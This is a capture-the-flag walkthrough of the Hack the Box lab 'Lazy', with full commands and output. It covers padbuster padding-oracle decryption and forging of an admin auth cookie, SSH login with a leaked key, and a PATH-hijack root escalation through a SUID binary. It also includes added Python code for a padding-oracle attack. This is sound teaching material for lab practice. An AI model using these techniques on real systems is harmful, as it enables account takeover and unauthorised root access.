HTB – Lazy

Today we are going to solve a CTF challenge, "Lazy", a lab developed by Hack the Box. They have an amazing collection of online labs on which you can practice your penetration testing skills, with labs designed for everyone from beginners to expert penetration testers. Lazy is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, they have a static IP. The Lazy lab has IP 10.10.10.18.

Now, as always, let's begin our hacking with port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.18
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-09 19:43 W. Europe Standard Time
Nmap scan report for 10.10.10.18
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
| 2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
| 256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_ 256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds

Port 80 is open, so let's open the IP in our browser to see whether a website is hosted on it. After opening the IP in the browser, we were greeted by a simple page with Register and Login links. Clicking on Register opens up a form.

Then I decided to register with admin and 123 as username and password respectively.

But I got an alert "Duplicate entry 'admin' for key PRIMARY", and also received the error "can't create the user: user exists" when I registered as admin. Hence the username "admin" is already registered.

At last, I decided to use Burp Suite to capture the browser request. Here I simply registered with puck as username and iestyle as password.

In the intercepted request I saw the auth cookie. Then I sent the intercepted request to the Repeater to analyse its response. It gave a hint, "invalid padding", which means there could be a padding oracle vulnerability. To know more about padding oracle vulnerabilities, read our previous article. Since I had already faced such a situation in the past, I knew what to do next.

Next, open a terminal and run padbuster with the target URL and the auth cookie copied above; the last part of its output shows the decrypted value in Base64, HEX and ASCII. The auth cookie is built from the account details, and padbuster shows that ours decrypts to user=puck, so the admin cookie is the same construction with user=admin. We are very near our goal: run padbuster once more, this time in encrypt mode with user=admin as the plaintext, to produce that cookie.

root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (132/256) [Byte 8]
[+] Success: (58/256) [Byte 7]
[+] Success: (176/256) [Byte 6]
[+] Success: (24/256) [Byte 5]
[+] Success: (205/256) [Byte 4]
[+] Success: (34/256) [Byte 3]
[+] Success: (96/256) [Byte 2]
[+] Success: (1/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): 6af32daa51efabef
[+] Intermediate Bytes (HEX): f7a7d836ec53c47d
[+] Plain Text: user=puc

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***

[+] Success: (23/256) [Byte 8]
[+] Success: (82/256) [Byte 7]
[+] Success: (21/256) [Byte 6]
[+] Success: (174/256) [Byte 5]
[+] Success: (88/256) [Byte 4]
[+] Success: (212/256) [Byte 3]
[+] Success: (13/256) [Byte 2]
[+] Success: (247/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): 1a65707e261e577c
[+] Intermediate Bytes (HEX): 01f42aad56e8ace8
[+] Plain Text: k

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=puck

[+] Decrypted value (HEX): 757365723D7075636B07070707070707

[+] Decrypted value (Base64): dXNlcj1wdWNrBwcHBwcHBw==

-------------------------------------------------------

root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0 -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

root@kali:~/htb/lazy#
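The mechanics that padbuster automates in the two runs above, as an added offline example that is not part of the original post: a constructed leaky server decrypts an 8-byte-block CBC cookie and reveals whether the padding was valid (the "invalid padding" hint seen in Repeater), which is enough to both read the cookie (decrypt mode, user=puck) and build a new one (encrypt mode, user=admin). The key, `block_decrypt` (a keyed PRF standing in for the server's unknown cipher) and all function names are assumptions for this example.

```python
import hmac, hashlib
BLOCK = 8  # padbuster was run with block size 8: the auth cookie is made of 8-byte blocks

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_decrypt(key, blk):
    # Stand-in for the server's unknown block decryption D_k (a keyed PRF constructed for this
    # example): CBC decryption only ever needs D_k, and the attack treats it as a black box.
    return hmac.new(key, blk, hashlib.sha256).digest()[:BLOCK]

def unpad(m):  # PKCS#7 check; None plays the server's "invalid padding" response
    n = m[-1]
    return m[:-n] if 1 <= n <= BLOCK and m[-n:] == bytes([n]) * n else None

def cbc_decrypt(key, token):  # token = IV || C1 || ... || Cn;  P[i] = D_k(C[i]) XOR C[i-1]
    c = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    return unpad(b"".join(xor(block_decrypt(key, c[i]), c[i - 1]) for i in range(1, len(c))))

def make_oracle(key):  # the leaky server: whether padding failed is visible to the client
    return lambda token: cbc_decrypt(key, token) is not None

def recover_intermediate(oracle, block):  # learn D_k(block) byte by byte from the oracle alone
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos  # aim for a decrypted tail of padv bytes all equal to padv
        for guess in range(256):
            prev = bytearray(inter[j] ^ padv if j > pos else 0 for j in range(BLOCK))
            prev[pos] = guess
            ok = oracle(bytes(prev) + block)
            if ok and pos == BLOCK - 1:  # second probe rules out a chance 0x02 0x02 match
                prev[pos - 1] ^= 0x55
                ok = oracle(bytes(prev) + block)
            if ok:
                inter[pos] = guess ^ padv
                break
        else:
            raise RuntimeError("oracle gives no padding signal")
    return bytes(inter)

def oracle_decrypt(oracle, token):  # read a cookie without the key (padbuster decrypt mode)
    c = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    return unpad(b"".join(xor(recover_intermediate(oracle, c[i]), c[i - 1]) for i in range(1, len(c))))

def oracle_forge(oracle, plaintext):  # padbuster -plaintext mode: encrypt without the key
    # Last block chosen as zeros (hence padbuster's 'AAAAAAAAAAA' tail), then work backwards
    # with C[i-1] = D_k(C[i]) XOR P[i], where D_k is supplied by the oracle.
    n = BLOCK - len(plaintext) % BLOCK
    pt, blocks = plaintext + bytes([n]) * n, [bytes(BLOCK)]
    for i in range(len(pt) - BLOCK, -1, -BLOCK):
        blocks.insert(0, xor(recover_intermediate(oracle, blocks[0]), pt[i:i + BLOCK]))
    return b"".join(blocks)
```

Each recovered byte costs up to 256 requests, so the attack shows up in server logs as hundreds of near-identical requests that differ in a single cookie byte. A server that authenticates the cookie before decrypting, or answers every failure identically, gives the `for ... else` branch nothing to distinguish and the attack stops.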

Now replace the original auth cookie with the encrypted value copied above and forward the intercepted request.

When Burp Suite sends the request, the web server logs you in as the admin account. On the admin page you will find a "my key" URL, which gives us a username, mitsos, and an SSH key.

As you can see, we have opened the SSH key; let's save it into a text file named "key" on the desktop. Notice also that the URL reveals the SSH login username, mitsos.

First, download the key and give it the appropriate permissions. Now that we have the SSH username and key, let's get an SSH session.

PS C:\PENTEST\htb\LAZY> ssh -i key mitsos@10.10.10.18
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Sat Mar 9 20:39:46 EET 2019

System load: 0.0 Processes: 174
Usage of /: 7.7% of 18.58GB Users logged in: 0
Memory usage: 11% IP address for eth0: 10.10.10.18
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Sat Mar 9 20:39:47 2019 from 10.10.14.20
mitsos@LazyClown:~$ ls
backup peda user.txt
mitsos@LazyClown:~$ cat user.txt
d55*****3fc

As we saw above, we also have the peda directory and the backup binary. On running the executable backup we saw that it prints the shadow file with the user hashes. So we ran the strings command and found that it does contain the command "cat /etc/shadow".

mitsos@LazyClown:~$ strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
cat /etc/shadow
;*2$"
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4
.symtab
.strtab

Now, all we need to do is create our own executable named cat, as shown below. The backup binary is SUID root (note the s bits in the listing) and calls cat /etc/shadow through system() without an absolute path, so cat is looked up in PATH. By putting the current directory first in PATH and dropping in a cat that runs /bin/sh, we make backup spawn a shell as root when it executes.

mitsos@LazyClown:~$ ls -la
total 64
drwxr-xr-x 5 mitsos mitsos 4096 May 3 2017 .
drwxr-xr-x 3 root root 4096 May 2 2017 ..
-rwsrwsr-x 1 root root 7303 May 3 2017 backup
-rw------- 1 mitsos mitsos 224 May 3 2017 .bash_history
-rw-r--r-- 1 root root 1 May 3 2017 .bash.history
-rw-r--r-- 1 mitsos mitsos 220 May 2 2017 .bash_logout
-rw-r--r-- 1 mitsos mitsos 3637 May 2 2017 .bashrc
drwx------ 2 mitsos mitsos 4096 May 2 2017 .cache
-rw------- 1 mitsos mitsos 2524 May 2 2017 .gdb_history
-rw-rw-r-- 1 mitsos mitsos 22 May 2 2017 .gdbinit
-rw------- 1 root root 46 May 2 2017 .nano_history
drwxrwxr-x 4 mitsos mitsos 4096 May 2 2017 peda
-rw-r--r-- 1 mitsos mitsos 675 May 2 2017 .profile
drwxrwxr-x 2 mitsos mitsos 4096 May 2 2017 .ssh
-r--r--r-- 1 mitsos mitsos 33 Jan 18 2018 user.txt
mitsos@LazyClown:~$ export PATH=.:$PATH
mitsos@LazyClown:~$ echo "/bin/sh" > cat
mitsos@LazyClown:~$ chmod 777 cat
mitsos@LazyClown:~$ ./backup
# whoami
root
# cd /
# ls
root.txt
# less root.txt
990*****515

Author: Jacco Straathof
